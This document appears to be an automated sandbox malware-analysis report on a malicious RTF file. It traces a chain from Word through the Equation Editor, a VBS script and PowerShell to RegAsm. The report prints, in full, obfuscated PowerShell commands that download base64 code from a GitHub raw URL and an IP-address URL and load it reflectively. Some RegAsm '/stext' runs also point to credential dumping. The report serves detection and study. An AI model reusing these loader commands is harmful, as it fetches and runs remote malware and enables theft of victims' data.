                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.391331579.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: RegAsm.exe, 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: DSpWOKW7zn.rtfReversingLabs: Detection: 57%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdom"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ftrhfuxf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\inwrfmihsqs"
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS" Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdom"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ftrhfuxf"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\inwrfmihsqs"Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
